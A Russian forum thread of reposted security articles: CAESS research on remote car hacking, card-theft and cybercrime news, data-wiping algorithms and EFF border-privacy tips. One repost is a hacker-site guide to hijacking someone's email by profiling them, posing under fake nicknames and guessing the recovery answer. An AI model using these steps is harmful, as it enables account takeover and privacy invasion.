Ну и дабы не пересказывать остальное содержание этой статьи, рассчитанной в основном на далеких от компьютерных технологий обывателей и вполне умышленно выдержанной в сгущенно-драматических тонах, здесь, наверное, будет правильнее сделать нечто другое. А именно: попытаться спокойно разобраться с сутью столь «тревожной новости», подыскав подходящий первоисточник — вроде обзорных исследовательских статей на темы подобного рода. И уже на основе этих материалов четче уяснить, что же такого серьезного выявили ученые хакеры относительно проблем с компьютерной безопасностью в автомобилях.

Одним из самых подходящих источников информации на заданную тему — одновременно компетентным, независимым и достаточно объективным — представляется так называемый CAESS, или Center for Automotive Embedded Systems Security (Центр безопасности встроенных автомобильных систем). Под этим названием набирает все большую известность объединенная команда исследователей из университетов Калифорнии (UCSD) и Вашингтона (UW), которые уже не первый год занимаются изучением всевозможных слабостей в работе автомобильных компьютерных систем. Коллектив возглавляют два молодых профессора, Стефан Сэведж (Stefan Savage) из Калифорнийского университета в Сан-Диего и Тадаеси Коно (Tadayoshi Kohno) из университета Вашингтона.

По многим из открытий, сделанным этой командой, были подготовлены доклады на специализированных симпозиумах и семинарах в 2010-2011 годах, так что на материалы данных публикаций вполне можно опереться для получения содержательной картины относительно компьютерной (не)безопасности в современных автомашинах.

Сегодняшний автомобиль управляется десятками различных по функциональности и назначению компьютеров, которые физически соединены через внутренние шины как электронные компоненты общей сети и, таким образом, способны воздействовать на работу друг друга. Кроме того, существенное количество этих компонентов сделано доступными и для внешних воздействий — через разнообразные интерфейсы ввода/вывода.
24876
Многочисленные исследовательские работы прошлых лет уже показали, что целеустремленные противники — если они имеют возможность посылать пакеты во внутреннюю проводную сеть машины — способны очень серьезно влиять на безопасность транспортного средства. В частности, эксперименты с реальными машинами подтверждали, что умелый хакер ныне вполне способен без ведома автовладельца включать/выключать двигатель, запирать/отпирать двери, блокировать работу тормозов, фальсифицировать показания спидометра и так далее. Причем подсаженные в сеть машины вредоносные программы, способные порождать аварийные ситуации, могут затем бесследно и полностью самоуничтожаться, создавая видимость самопроизвольного отказа оборудования.

Практически во всех тех экспериментах, правда, для установки вредоносных кодов исследователям приходилось сначала подключать свой ноутбук к системе внутренней диагностики машины-жертвы. Однако в последних работах команды CAESS, доложенных в 2011 году, целью исследований уже стало отыскание путей для проникновения в компьютерную сеть машины без непосредственного контакта. Иначе говоря, моделировалась максимально реалистичная ситуация, в которой злоумышленник не имеет возможности влезть в чужую машину со своим ноутбуком.
Авторы «страшных» фотографий иногда добиваются строго противоположного эффекта. Например, даже трудно представить — каким недалеким должен быть негодяй, чтобы забраться в чужую машину для запуска на явно не подключенном к Интернету ноутбуке браузера Internet Explorer…

Несмотря на столь существенные ограничения, исследователям и тут удалось найти множество методов для электронного взлома автомобиля: через каналы встроенной в машину системы Bluetooth, через сети сотовой связи или, наконец, через «особо заточенные» аудиофайлы с музыкой.

Направления атаки

Атака через CD — один из наиболее колоритных, вероятно, способов проникновения. Добавляя фрагменты дополнительного кода в цифровой музыкальный файл, ученые сумели превратить записанную на CD песню, по сути дела, в троянского коня. Когда такой файл воспроизводится автомобильной стереосистемой, «песня троянца» способна перепрограммировать прошивку магнитолы, в итоге предоставляя злоумышленникам точку входа в сеть для воздействия на прочие компьютерные компоненты автомашины. При этом каналами массового внедрения для таких автомобильных троянцев могут становиться общепринятые сервисы свободного распространения музыки вроде файлообменных сетей.

Другой сравнительно просто реализуемый метод заражения — через Bluetooth. Данная технология давно стала де-факто стандартом для поддержки телефонных звонков без участия рук и, соответственно, уже является стандартной коммуникационной системой в серийных автомобилях всех основных автопроизводителей.
24877
На этой картинке перечислены лишь основные способы внешних и внутренних электронных коммуникаций современного автомобиля

Чтобы реально оценить эффективность атаки через Bluetooth, исследователями было создано несложное приложение типа «конь троянский» на базе телефона HTC Dream под ОС Android 2.1. Как и положено шпиону, это приложение внешне выглядело совершенно невинным, однако скрытно отслеживало появление возможностей для новых Bluetooth-соединений. Делалось это, чтобы проверить и посмотреть, не является ли другая сторона телематическим устройством автомобиля (часто, как в конкретном случае протестированных машин, их Bluetooth-устройство идентифицирует себя в эфире по имени фирмы-производителя автомобиля). Если машина обнаруживалась, троянец загружал в автомобиль соответствующий код-закладку для последующей атаки.

Хотя ученые-хакеры даже не пытались закачивать код своего троянца (под видом невинной бесплатной программки) на всеобщий рынок приложений Android Market, имеется немало свидетельств тому, что менее чистоплотные «исследователи» и злоумышленники то и дело выкладывают подобные шпионские программы для всеобщего скачивания. Кроме того, в достатке имеются известные эксплойты, способные скомпрометировать и заразить смартфоны Android или iPhone в тот момент, когда с них заходят на инфицированные злоумышленниками веб-сайты. Иначе говоря, оценочные исследования показывают, что смартфоны могут становиться вполне жизнеспособным каналом для эксплуатации Bluetooth-уязвимостей автомобиля при беспроводной связи на коротких расстояниях.

В качестве других путей для эффективной компрометации электроники автомобиля, как продемонстрировали ученые, могут выступать стандартные каналы сотовой связи. Иначе говоря, у злоумышленников имеются возможности звонить и подсоединяться к машине через сети мобильной телефонии, получая полное управление телематической подсистемой автомобиля на расстояниях фактически любой дальности. Еще одно доказуемо эксплуатируемое направление компрометации — интерфейсные компьютерные устройства PassThru, применяемые персоналом на станциях автосервиса при электронной диагностике и техобслуживании машин. Как показали эксперименты, при заражении вредоносным кодом всего одного такого устройства, скомпрометированными оказываются все последующие машины, подключавшиеся к PassThru.

Эксплуатация заражения

Скомпрометированные в автомобиле ECU (Electronic Control Unit — блок электронного управления) — это, однако, только половина всей истории. Остальная часть проблемы — это то, что атакующая сторона способна затем сделать с полученными подобным образом возможностями.

По мнению исследователей, обращенные вовне интерфейсы автомобиля для ввода/вывода информации после компрометации могут быть использованы для того, чтобы дистанционно включать/выключать произвольные функции машины или в целом управлять ими, а также дистанционно получать от нее координаты физического местоположения или даже перехватывать разговоры, ведущиеся в салоне автомобиля.

Дабы максимально наглядно проиллюстрировать, каковы могут быть реальные риски от подобных угроз, исследователи описывают два базовых сценария криминального автомобильного хакинга, наиболее близкие по сути к «обычным» компьютерным преступлениям.

Кражи

Используя любую из реализованных на практике возможностей по компрометации электроники в машине (CD, PassThru, Bluetooth, сотовая связь) совсем несложно скомандовать машине открыть двери по требованию внешнего источника. Более дальновидный автомобильный вор вполне способен сообразить, что массовая дистанционная компрометация машин «вслепую» может быть использована для того, чтобы существенно изменить не только масштаб, но и, в конечном счете, саму бизнес-модель этого занятия.

Так, вместо того чтобы атаковать какую-то конкретную машину-цель, умный вор может попытаться скомпрометировать настолько много машин, насколько это вообще возможно (например, известной техникой сетевых хакеров war dialing — т. е. автоматическим «прозвоном» всех попадающихся в поле доступа систем, помечая и заражая те из них, что не защищены от вторжения).

Вероятный элемент такой компрометации: преступник может скомандовать каждой машине связываться с его центральным сервером и докладывать туда свои координаты в сочетании с VIN, идентификационным номером транспортного средства (Vehicle Identification Number). То, что это вполне возможно реализовать (через сеть IRC), показали практические эксперименты исследователей. Идентификатор VIN, в свою очередь, кодирует в себе год выпуска, фирму и модель каждой машины, а следовательно — и ее рыночную стоимость.

Складывая все эти возможности вместе, технически продвинутый автомобильный вор мог бы устраивать процедуры «просеивания» среди множества зараженных машин, выявлять среди них наиболее ценные, отыскивать их текущее местонахождение (а также, возможно, определять и то, как долго машина стоит припаркованная), а затем — посетив объект интереса на месте — дать машине команду на открывание дверей и… ну, вы понимаете.

Более того, особо продвинутый вор с корпоративным размахом может вообще перестать воровать машины сам, а вместо этого продавать свои технические возможности в качестве «сервиса» другим ворам помельче. Типа: «Алло, мне нужны последние модели BMW или Audi, в радиусе около 500 метров от Старого Арбата. У вас есть что-нибудь эдакое для меня?»

Сведущие читатели наверняка заметят, что описываемая картина криминального прогресса — это зеркальное отражение эволюции, которую претерпела известная история с компрометацией настольных компьютерных систем. Где развитие криминального хакинга шло от индивидуальных атак к массовой эксплуатации выявленных слабостей через червей и вирусы, а затем и к подпольным рынкам, где доступ к скомпрометированным компьютерам продается в качестве сервиса.

Хотя представленный исследователями сценарий на сегодня считается лишь гипотетическим, это не означает, что он нереалистичен. Ученые реализовали по отдельности все этапы этой атаки — начиная с того, что вор дистанционно отключает защитные меры автомобиля, позволяя даже совсем неопытному напарнику забраться в машину и угнать ее с места стоянки. В частности, данная атака заставляет скомпрометированную телематику машины отпереть двери, запустить мотор, отключить соленоид замка, блокирующего сдвиг рычага передачи (который обычно не дает сдвинуть машину из состояния паркинга без наличия ключа), и подделать пакеты, используемые в протоколе запуска машины (таким образом обходя существующие противоугонные меры устройств-иммобилайзеров).

Все ключевые элементы этой атаки были реализованы при экспериментах над собственным автомобилем ученых — популярным серийным седаном из средней ценовой категории. В этих экспериментах, правда, напарник хакера-вора водил «украденную» машину только вперед и назад, потому что хозяину не хотелось взламывать замок рулевой колонки. Но это, конечно, не препятствие: многочисленные видеоуроки в Интернете демонстрируют, как делается подобный трюк с помощью обычной отвертки. (В машинах подороже замок рулевой колонки управляется уже бортовым компьютером — а это для умелого хакера преодолеть еще проще.)

Слежка

В ходе исследований своих возможностей ученые обнаружили, что злоумышленник, скомпрометировавший телематическое устройство машины-жертвы, может дистанционно слушать и записывать аудиоинформацию с находящегося в кабине микрофона (обычно он предназначен для телефонных звонков водителя без участия рук), по команде передавая данные прослушки вовне — через подсоединенный к машине IRC-канал.

Более того, благодаря встроенным в машину средствам геолокации, оказывается легко регистрировать текущее местоположение автомобиля на постоянной основе и таким образом следить за тем, где бывает водитель. Эти возможности, которые оценивались в непосредственных экспериментах, представляются чрезвычайно полезными и востребованными среди частных детективов, корпоративных шпионов, ряда категорий журналистов и других профессионально любопытствующих персонажей, постоянно изыскивающих способы для подслушивания приватных разговоров.

24878
Начиняя машину электроникой, производители невольно подкладывают будущим владельцам умное, но скромное животное с круглым носиком

Родовой дефект

Размышляя над массой уязвимостей, обнаруженной ими в электронике автомобилей, исследователи обратили внимание на примечательное сходство ситуаций, в которых эти бреши появляются. Как установлено, практически все уязвимости возникают в области «пограничных» интерфейсов — то есть между кодами, написанными разными фирмами и организациями.

В качестве наглядного примера рассматривается широко распространенный в автомашинах программный модем Airbiquity, реализующий преобразование аналоговых сигналов — речи водителя — для их передачи в цифровых сетях связи. Уязвимости обнаружены не в нем самом, а, скорее, в «склеивающем» коде, который вызывает модем и состыковывает его с другими телематическими функциями.

По такой же схеме все «работает» и в других компонентах системы. Так, уязвимость Bluetooth возникает из-за аналогичного взаимного «недопонимания» между стороной, вызывающей библиотеку стека протокола Bluetooth, и теми, кто этот стек реализовал. Уязвимость подсистемы PassThru обнаруживается в склеивающем коде на основе скриптов, который пытается устроить интерфейс между проприетарным протоколом конфигурации и стандартными скриптами ОС Linux. Даже уязвимость в перепрограммировании прошивки медиаплеера выглядит так, словно возникла она лишь потому, что изготовитель машины был просто не в курсе относительно встроенных в код подсистемы возможностей для перепрошивки чипа с помощью CD.

И хотя проблемы пограничных интерфейсов — это, строго говоря, общая проблема для безопасности всех видов программного обеспечения, исследователи уверены, что особые структурные причины делают эту угрозу особенно вероятной в автомобильной промышленности.

В частности, автоиндустрия приняла такую модель аутсорсинга применительно к компьютерным программам, которая совершенно аналогична применяемой для обычных автодеталей. То есть речь идет лишь о предоставлении спецификаций подрядчику и заключении с ним контракта на поставку комплектующих. В результате для большинства компонентов автомобиля производитель не осуществляет разработку программ сам, а лишь отвечает за их объединение в одно целое.

Причем чаще всего изготовители машин вообще не имеют доступа к исходным кодам для блоков ECU, которые они получают по контракту (а поставщики, в свою очередь, крайне не любят предоставлять такие коды, поскольку именно тексты кодов составляют их главную интеллектуальную собственность, которая, собственно, и дает им ощутимые преимущества перед производителем машины).


Даже при сборке автомобиля из деталей, полученных от разных поставщиков, случаются неприятности. Что говорить о стыковке друг с другом очень разных цифровых технологий

В итоге же, хотя каждый поставщик и осуществляет собственное тестирование устройства (на предмет соответствия спецификациям), для производителя машины оказывается чрезвычайно сложным оценить уязвимости, возникающие на стадии интеграции компонентов. Традиционные способы автоматического анализа и проверки кода здесь не применимы, а разного рода «предположения», которые по умолчанию кем-то подразумеваются, но в явном виде не включены в спецификации, весьма сложно разглядеть для подобающего их анализа.

Таким образом, общепринятый процесс аутсорсинга, вполне подходящий для чисто механических систем, оказывается совершенно неприемлемым для цифровых систем, имеющих солидный потенциал для их дистанционной компрометации.

Выводы и предложения

Разработка решений безопасности, совместимых с «автомобильными экосистемами», — это на редкость трудная задача, уже сейчас настоятельно требующая более интенсивного общения между сообществом компьютерной безопасности и автомобильными производителями (фактически в том же самом ключе, как эксперты по инфозащите сегодня напрямую взаимодействует с изготовителями компьютерных программ и железа).

Одна из вполне очевидных причин, по которым подобное сближение происходит очень медленно, сводится к простому факту: автомобили пока что нельзя считать объектом значительного интереса и атак со стороны компьютерно-продвинутых злоумышленников. Традиционно автомобили не считались системами, пронизанными компьютерными сетями, а потому у производителей не было никакой нужды принимать меры против злоумышленников, действующих на расстоянии. Всякий же негодяй, имевший возможность подобраться к машине достаточно близко для модификации системы, одновременно оказывался достаточно близко и для того, чтобы нанести существенный вред куда более незамысловатыми физическими средствами.

Теперь же стало так, что современные автомобильные системы открыли широчайшие возможности для внешних подсоединений. В буквальном смысле к миллионам машин на дорогах и стоянках уже сегодня можно дистанционно подключиться.

Основная часть исследовательских работ в данной области, подчеркивают ученые CAESS, была мотивирована сильным желанием не допустить того, чтобы автомобильные производители начали повторять ошибки индустрии ПК — дождаться тяжелейших компьютерных атак, прежде чем возвести безопасность в ранг одного из главных приоритетов своей деятельности.


Учитывая весь наработанный ранее опыт, эксперты по инфобезопасности считают, что очень многие из тех уроков, что были усвоены в процессе укрепления защиты настольных систем, ныне могут быть быстро переориентированы в контекст компьютерных систем, встроенных в автомобиль.

В одной статье, пусть даже и такой немаленькой, как эта, трудно рассказать обо всех наработках CAESS. Если тема вас заинтересовала, зайдите на веб-сайт исследователей, расположившийся по адресу http://www.autosec.org/. И всегда надо помнить: автомобиль слишком велик, чтобы исправить все уязвимости в безопасности при помощи шапочки из фольги…

24879
Пока автопром еще не перестроился под современные цифровые реалии, лучше приобретать автомобиль без компьютерной начинки. Как говорится, полчаса позора — и вы на работе!
http://www.3dnews.ru/offsyanka/623605/
http://www.zamkidveri.com/forum/images/imported/2012/01/3dn-1.gif?9241816

SAWWA
19.02.2012, 20:21
Деньги с банковской карты можно украсть по-новому
Чиновники готовят перевод граждан на электронные платежи
2012-02-16 / Михаил Сергеев

Российские власти взяли курс на вытеснение наличных денег и сплошного «обилечивания» граждан электронными картами, которые заменят кошелек, паспорт, страховой полис и даже магнитный проездной. Первое совещание по ограничению наличного оборота состоится в правительстве уже на следующей неделе. Готовятся к массовому внедрению электронных кошельков взломщики и хакеры. В конце января они показали, как можно украсть деньги с банковской карты дистанционно – даже не прикасаясь к ней.

Борьба с наличными деньгами разворачивается в России сразу на двух направлениях. Региональные власти готовятся выдать жителям так называемые универсальные электронные карты (УЭК), которыми заменят паспорт, кошелек, банковскую карточку, проездной билет и другие документы. С другой стороны – федеральные власти вплотную занялись ограничением наличных платежей. Минфин даже создал постоянно действующую межведомственную группу, которая будет «стимулировать рост доли безналичных платежей». После 2013 года использование УЭК станет практически обязательным: для отказа от этой карты потребуется написать специальное заявление «в уполномоченную организацию субъекта Федерации в установленные законом сроки».

При этом внедряемая властями карта является вполне коммерческим инструментом: она может использоваться «в банковском платежном терминале, общественном транспорте для оплаты проезда, в сетях быстрого обслуживания, в государственных, муниципальных и коммерческих системах управления доступом, а также в обычном магазине для оплаты покупок». Оплата может происходить контактным способом – как в банкомате или бесконтактно – как при использовании магнитного проездного. И именно эта особенность карты создает дополнительные возможности для взломщиков и хакеров.

В конце января американские специалисты показали, что банковские карты можно взломать дистанционно. С использованием общедоступного оборудования и всего за две минуты хакер похитил деньги с карты – никак к ней не прикасаясь. Теперь похитить деньги можно будет в толпе, в очереди, в магазине или на транспорте, рассказывают американские специалисты.

Однако российские разработчики убеждены в высокой надежности универсальных карт. «Возможность хищения с универсальной электронной карты сводится к нулю. УЭК будет одной из самых защищенных пластиковых карт. В отличие от банковской карты в нее встроены как аппаратные, так и программные средства защиты, которые находятся под строгим контролем государства», – говорит пресс-секретарь федеральной уполномоченной организации «Универсальная электронная карта» Юлия Кучкина. Тем не менее необходимость обучения граждан на предмет использования универсальных электронных карт признают и в этой федеральной уполномоченной организации.

Независимые эксперты не столь оптимистичны. «Чем больше мы используем карту, например, для оплаты проезда в транспорте, для оплаты услуг в Интернете, тем больше возможностей у злоумышленников», – считает эксперт департамента оценки «2К Аудит – Деловые консультации/Морисон Интернешнл» Петр Клюев. Особенно тяжело привыкать к новым требованиям придется пожилым гражданам – и это еще один плюс для мошенников. По его словам, демонстрация хакерских технологий в США только доказывает уязвимость УЭК.

«Опасность есть всегда, и теоретически можно придумать механизм хищения средств с УЭК, но фактически сейчас не задокументировано случаев взлома карт с чипом. Если на карте есть чип, контактный или бесконтактный, то подобрать к нему пароль можно только в лабораторных условиях», – говорит зампредправления СДМ-Банка Вячеслав Андрюшкин. По его словам, рекомендации по безопасности для УЭК вряд ли будут отличаться от стандартных: не терять и не оставлять коды доступа.
«Несколько банков уже реализовывали схему по оплате проезда в метро с помощью кредитных карт на основе бесконтактной технологии, и никаких громких случаев по эксцессам с данными картами не было», – отмечает председатель правления ФлексБанка Марина Мишурис. Все опрошенные эксперты уверены, что массовый ликбез по использованию УЭК в стране необходим.
Деньги с банковской карты можно украсть по-новому - Чиновники готовят перевод граждан на электронные платежи (http://www.ng.ru/economics/2012-02-16/4_cards.html)

SAWWA
22.02.2012, 22:31
к сожалению информация адекватная, из реальной жизни, всё работает, проверено и давно
взлом почтовых ящиков
[ Хакерство для новичков ]

Идея написания данной статьи возникла в свете последних активных обсуждений в форуме портала проблем, связанных со взломом почтовых ящиков; их методов и подходов.
Итак, что же мы понимаем под термином “социальная инженерия” (далее СИ). В общем смысле СИ является частью социальной психологии, направленной на изменение поведения человека под действием искусственно создаваемых факторов. Мы же будем рассматривать её в этой статье как нетехнический методом взлома, который опирается на выявление всевозможной информации о жертве. Оговорюсь, что под термином “взлом почтового ящика” будем подразумевать смену пароля, а не его выявление (подбор). Наша цель в таком случае – невозможность дальнейшего использования ящика жертвой.
Начнём. “С чего?” – зададите вы вопрос. Со сбора информации, конечно же. Ведь и в конечном итоге вся СИ опирается на количество, точность и достоверность информации о жертве. Не маловажны и методы сбора этой информации. Нам необходимо узнать интересующую нас информацию так, чтобы человек, находящийся в центре нашего внимания, не заметил ничего подозрительного и рассказал нам о своих секретах как, например, о новом диске.
Каковы же источники информации о человеке?
Первый источник – это его сайт/страничка, на которой в большинстве случаев мы можем увидеть автобиографию жертвы, узнать о его увлечениях и пристрастиях. Также на большинстве таких страничек присутствуют разного рода координаты для связи: телефон, адрес (редко), e-mail (всегда), ICQ и др.
Второй источник – чат/форум, где жертва постоянно/часто бывает. В чате можно познакомиться с ним, использую несколько ников. Желательно использовать ники как женского, так и мужского пола. Посмотрите, как ведёт себя жертва при общении с противоположным полом. Не секрет, что человек, общаясь с противоположным полом может рассказать намного больше…
Третьим источником является ICQ. Во-первых, мы можем многое узнать из информации, оставленной о себе. Во-вторых, ICQ – тот же чат, только свидетелей меньше, а значит человека можно “раскрыть” полностью.
Исследовав все эти источники, мы узнаём человека со всех сторон, если так можно выразиться. Теперь нацелимся на сам почтовый ящик. Для начала из собранных данных попытаемся извлечь вероятный пароль к ящику жертвы. Помните: индукция, дедукция…
Не вышло? Что ж, не расстраиваемся. Следующий вариант – ответ на контрольный вопрос для восстановления пароля. Здесь рамки нашего исследования сужаются. Из всей полученной информации о жертве не так уж и сложно вычислить например “Ваше любимое блюдо”…
Главное – думать, думать и ещё раз думать. Ведь с таких простых вещей и начинается путь в хакеры :))).
Всем удачи!


Veralex - HackZona.Ru

поэтому ИНТЕРНЕТ - НЕ МЕСТО ДЛЯ КОНФИДЕНЦИАЛЬНОГО И СОКРОВЕННОГО

SAWWA
28.02.2012, 19:28
2510025101
полезная штучка для блокировки маячков GPS

SAWWA
29.02.2012, 12:54
доступ к чужому имуществу посредством социальной психологии, ловцы душ человеческих, сначала доступ к уму и сердцам, потом - к кошелькам, только в завуалированной форме:


http://www.youtube.com/watch?feature=player_embedded&v=07QLp4P9eZI
так называемый способ социального взлома

SAWWA
25.03.2012, 13:11
Федеральный суд в Нью-Йорке приговорил к 33 месяцам тюрьмы Дмитрия
Насковца. Этот человек ранее признал себя виновным в 5 тыс. случаях
актов кибермошенничества и 2 тыс. случаях так называемой «кражи
личности», когда злоумышленники неправомерно используют личные
данные других людей. Насковцу грозило 38 лет тюрьмы, однако судья
вынес более мягкий приговор.
Белоруса арестовали в Чехии 15 апреля 2010 года по запросу американских
властей, после чего он был экстрадирован в США. Одновременно был
задержан предполагаемый сообщник Насковца Сергей Семашко, сообщает
«Голос Америки».
По данным федеральной прокуратуры США, в 2007 году молодые люди
создали сайт CallService.biz, который предоставлял услуги сетевым
мошенникам, помогая им снимать средства с кредитных карт. При этом
использовались краденные банковские данные, а на группу работала сеть
англоговорящих операторов, которые вводили в заблуждение работников
банков, проверявших по телефону правомерность снятия средств.
Федеральный прокурор Южного округа Нью-Йорка Прит Бхарара посчитал
признание вины Дмитрием Насковцом смягчающим обстоятельством и
приговорил его к 33 месяцам тюрьмы. По словам представителя Фемиды,
«дело является наглядным примером того, что киберпреступность не имеет
географических границ». Он также добавил, что США продолжат
сотрудничество «с партнерами по всему миру с тем, чтобы поймать и
наказать киберпреступников».

m.voanews.com/russian/Belarusian-Cyber-Criminal-Sentence-2012-03-23-144010386.html

SAWWA
20.04.2012, 02:53
http://www.mvd.ru/news/show_104740/
Незаконный перевод денежных средств на пластиковую карту закончился возбуждением уголовного дела

http://www.zamkidveri.com/forum/images/imported/2012/02/logo_ru-1.png

Вчера сотрудники транспортной полиции возбудили уголовное дело в отношении менеджера одной из крупных сетей сотовой связи, который, используя свое служебное положение, незаконно перевел с рабочего компьютера на свою пластиковую карту крупную денежную сумму.

На днях в дежурную часть Санкт-Петербург-Финляндского линейного управления МВД России на транспорте обратились представители сети салонов связи, действующих в Санкт-Петербурге, с заявлением о том, что в одном из принадлежащих им офисов с рабочего компьютера произошло хищение денежных средств на общую сумму 25 тысяч рублей.

В ходе проведения тщательно продуманной оперативной комбинации сотрудниками транспортной полиции был установлен житель Санкт-Петербурга 1985 года рождения, подозреваемый в совершении данного преступления.

Схема обогащения была проста. Являясь сотрудником указанного салона связи и имея доступ к служебной базе, менеджер без лишних усилий мог перечислять денежные средства на свою пластиковую карту. Этим он и решил воспользоваться.

Незаконно проникнув в один из временно неработающих офисов, который располагался на втором этаже Финляндского вокзала, он перечислил на свой счет сумму в размере 25 тысяч рублей. Нечестный на руку менеджер предпринял еще одну попытку снять со счета 85 тысяч рублей, но на этот раз он потерпел неудачу.

В настоящее время сотрудники транспортной полиции устанавливают причастность указанного гражданина еще к шести подобным хищениям. Возбуждено уголовное дело по ч. 2 ст. 158 УК РФ («Кража»).

Пресс-служба УТ МВД России по СЗФО

SAWWA
05.05.2012, 00:20
Учимся правильно уничтожать информацию - пароли, тексты ключей, переписку, приказы, указы и т.д.:

Алгоритмы уничтожения информации — последовательность операций, предназначенных для осуществления программными и/или аппаратными средствами необратимого удаления данных, в том числе остаточной информации.

Как правило, данные алгоритмы используются государственными учреждениями, прочими специализированными структурами и предприятиями в целях сохранения государственной и/или коммерческой тайны. В настоящее время всем желающим сохранить удалённую информацию в тайне доступны программные средства безопасного удаления (уничтожения) информации, в том числе программы с открытым исходным кодом.

Алгоритмы уничтожения информации используются так же в средствах программного шифрования информации для безопасного удаления временных файлов и уничтожения исходных, поскольку в противном случае, используя классическое удаление, существует возможность восстановления исходного файла лицом, желающим получить доступ к личной или секретной информации.

Алгоритмы уничтожения информации на данный момент стандартизированы, практически во всех ведущих государствах изданы национальные стандарты, нормы и правила, регламентирующие использование программных средств для уничтожения информации и описывающие механизмы его реализации.

Все программные реализации алгоритмов уничтожения информации основаны на простейших операциях записи, тем самым происходит многократная перезапись информации в секторах жесткого диска или блоках SSD-диска ложными данными. В зависимости от алгоритма это может быть сгенерированное генератором псевдослучайных чисел случайное число либо фиксированное значение. Как правило, каждый алгоритм предусматривает запись восьми битовых единиц (#FF) и нуля (#00). В существующих алгоритмах перезапись может производиться от одного до 35 и более раз. Существуют реализации с возможностью произвольного выбора числа циклов перезаписи.

Теоретически, простейшим методом уничтожении исходного файла является его полная перезапись байтами #FF, то есть битовой маской из восьми двоичных единиц (11111111), нулей либо любых других произвольных чисел, тем самым сделав невозможным его программное восстановление доступными пользователю программными средствами. Однако с использованием специализированных аппаратных средств, анализирующих поверхность магнитных и др. носителей информации и позволяющих восстановить исходную информацию исходя из показателей остаточной намагниченности (в случае с магнитными носителями) или др. показателя, существует вероятность, что простейшая перезапись не гарантирует полноценное уничтожение, подлежащей полному уничтожению информации.

С целью исключения любой возможности восстановления и разработаны существующие алгоритмы уничтожения информации.

Наиболее известен и распространён алгоритм, применяемый в американском национальном стандарте Министерства обороны DoD 5220.22-M. Вариант E, согласно данному стандарту, предусматривает два цикла записи псевдослучайных чисел и один — фиксированных значений, зависимых от значений первого цикла, четвёртый цикл — сверка записей. В варианте ECE перезапись данных производится 7 раз — 3 раза байтом #FF, три #00 и один #F6.[1]

В алгоритме Брюса Шнайра: в первом цикле записывается #FF, во втором — #00 и в пяти остальных циклах — псевдослучайные числа. Считается одним из наиболее эффективных.

В наиболее медленном, но, по мнению множества экспертов, наиболее эффективном алгоритме Питера Гутмана, выполняются 35 циклов, в которых записывают все наиболее эффективные битовые маски, данный алгоритм основан на его теории уничтожения информации[2].


В алгоритме, предусмотренном американским национальным стандартом NAVSO P-5239-26 для MFM-кодируемых устройств: в первом цикле записывается #01, во втором — #7FFFFFF, в третьем — последовательность псевдослучайных чисел, в четвёртом проходит верификация. В варианте для RLL — кодируемых устройств данного алгоритма во втором цикле записывается #27FFFFFF

В алгоритме, описываемом германским национальным стандартом VSITR, с первого по шестой цикл записываются последовательно байты #00 и #FF, в седьмом #AA.

Многими заявляется о существовании алгоритма, описанного Российским государственным стандартом ГОСТ P 50739-95, предусматривающего запись #00 в каждый байт каждого сектора для систем с 4-6 класса защиты и запись псевдослучайных чисел в каждый байт каждого сектора для систем 1-3 класса защиты[3]. Однако данный ГОСТ содержит лишь формулировку «Очистка должна производиться путём записи маскирующей информации в память при ее освобождении перераспределении», которая не содержит какой-либо детализации относительно порядка перезаписи, количества циклов и битовых масок[4]. В то же время, существует действующий Руководящий документ Государственно технической комиссии России «Автоматизированные системы. Защита от несанкционированного доступа к информации. Классификация автоматизированных систем и требования по защите информации», изданный в 1992 году и предусматривающий ряд требований к механизму уничтожения информации для систем определённых классов защищенности. В частности, для классов 3А и 2A «Очистка осуществляется двукратной произвольной записью в освобождаемую область памяти, ранее использованную для хранения защищаемых данных (файлов)», для класса 1Г предусмотрена однократная перезапись.[5]

В алгоритме Парагона первый цикл заключается в перезаписи уникальными 512-битными блоками, используя криптографически безопасный генератор случайных чисел. Затем — во втором цикле — каждый перезаписываемый блок переписывается своим двоичным дополнением. Третий цикл повторяет первый цикл с новыми уникальными случайными блокам. В четвёртом цикле происходит перезапись байтом #AA. Завершается уничтожение информации циклом верификации.

Как правило, для затруднения программного восстановления информации перезапись информации в отдельном файле согласно алгоритму уничтожения сопровождается установкой нулевого размера файла и его переименованием, используя произвольный набор символов. Затем следует удаление файла из таблицы размещения файлов.
http://ru.wikipedia.org

SAWWA
05.05.2012, 00:37
Пересекая границы реальные и виртуальные. Теория
http://www.3dnews.ru/workshop/628332
Автор: Игорь Осколков

Дата: 26.04.2012

В прошлом году некоммерческая правозащитная организация «Фонд электронных рубежей» (EFF, Electronic Frontier Foundation) выпустила сборник советов для путешественников, отправляющихся в США и заботящихся о защите своих данных. Советы довольно очевидные, но многие про них почему-то забывают

Введение

На самом деле все эти правила достаточно универсальны, но некоторые поправки на законодательство той страны, куда вы въезжаете, надо обязательно делать. В чём собственно заключается проблема? Дело в том, что в ряде государств при пересечении границы у вас вполне могут досмотреть не только личные вещи, но и ваши электронные устройства. Фактически «люди в погонах» вполне могут покопаться в вашей информации и, в случае чего, скопировать некоторые данные для дальнейшего анализа. В том числе с привлечением технических специалистов. На практике процент таких досмотров крайне невелик, да и просто так они обычно не проводятся. Тем не менее любой подобный инцидент может грозить различными неприятностями — от элементарной потери времени до запрета въезда в страну.
Впрочем, это мелочи по сравнению с утечкой данных, содержащих коммерческую тайну или, к примеру, медицинские сведения. Сколько там ноутбуков ежегодно теряют агенты спецслужб? Как бы то ни было, информация частенько стоит намного дороже железки, на которой она хранится. Если вам наплевать на собственную приватность, а судя по профилям в социальных сетях, для большинства это норма жизни, то побеспокойтесь хотя бы за чужую конфиденциальную информацию, которую вам доверили. В крупных корпорациях за пользователей болеет паранойей служба безопасности, а что же делать другим? Например, гордым молодым разработчикам со своим стартапом, которые хотят выбить немного золота из толстых мешков потенциальных инвесторов. Есть несколько простых правил, которым надо следовать всегда и везде.

Архивируй и шифруй

Во-первых, как можно чаще делайте бэкапы. Если потеряете носитель с информацией, то она всё равно останется при вас. Во-вторых, всегда шифруйте важные данные. Если накопитель будет изъят, забыт или украден, то получить доступ к ним будет затруднительно. Естественно, бэкапы тоже должны быть зашифрованы. Резервные копии можно хранить как на отдельном жёстком диске, так и в облаке. В Windows 7, Linux и Mac OS уже давно есть встроенные функции и для автоматического бэкапа, и для шифрования томов. Воспользуйтесь хотя бы ими. Для шифрования отдельных папок, в том числе Dropbox, подойдёт система EncFS, о которой мы уже писали. Более функциональна, но и сложнее в настройке знаменитая программа TrueCrypt. В качестве сторонней утилиты для регулярного инкрементального бэкапа с шифрованием идеально подходит пакет Duplicati, который есть для всех основных ОС. Сохранить копии данных из социальных сетей помогут вот разные утилиты.
